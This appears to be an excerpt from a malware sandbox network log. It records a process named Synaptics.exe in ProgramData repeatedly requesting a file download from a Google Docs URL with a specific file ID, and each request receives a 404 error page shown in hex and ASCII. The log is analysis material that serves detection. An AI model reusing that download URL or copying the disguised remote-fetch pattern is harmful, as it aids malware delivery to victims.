                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NKhLoOGcdcQi8w6BTgpTXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC815INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:04 UTC815INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 66 78 45 35 66 34 63 52 37 4e 72 53 6f 34 59 7a 49 6c 62 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LfxE5f4cR7NrSo4YzIlbdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:04 UTC816INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:04 UTC817INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        269192.168.2.350055142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC814OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC817INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-42i9Ku7AWJFx9dh3wnYF6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC818INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:05 UTC818INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 38 51 32 6f 77 44 7a 2b 6c 38 38 76 4c 34 53 30 78 67 70 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="58Q2owDz+l88vL4S0xgpBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:05 UTC819INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:05 UTC820INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        27192.168.2.349766142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC81OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        270192.168.2.350056142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC817OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC820INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-F01gwGTljqSml87PjQMGTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC821INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:05 UTC821INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 69 4b 43 79 37 68 36 2f 4d 46 34 48 4a 78 6c 31 58 31 69 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GiKCy7h6/MF4HJxl1X1ibg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:05 UTC822INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:05 UTC823INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        271192.168.2.350057142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC820OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC823INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yQ2ri+FV/6AvwIWEwg6doQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC824INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 43 48 70 4f 2f 4e 59 65 59 4f 41 58 41 6c 51 34 67 72 54 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gCHpO/NYeYOAXAlQ4grTFw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:05 UTC826INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:05 UTC826INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        272192.168.2.350058142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC823OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC826INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wmOomDbFQsDWgwkY0KvnAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC827INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 38 35 42 4c 2b 30 52 4f 61 30 32 2b 78 71 42 61 45 72 78 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="s85BL+0ROa02+xqBaErxQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:05 UTC829INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:05 UTC829INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        273192.168.2.350059142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC826OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC829INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
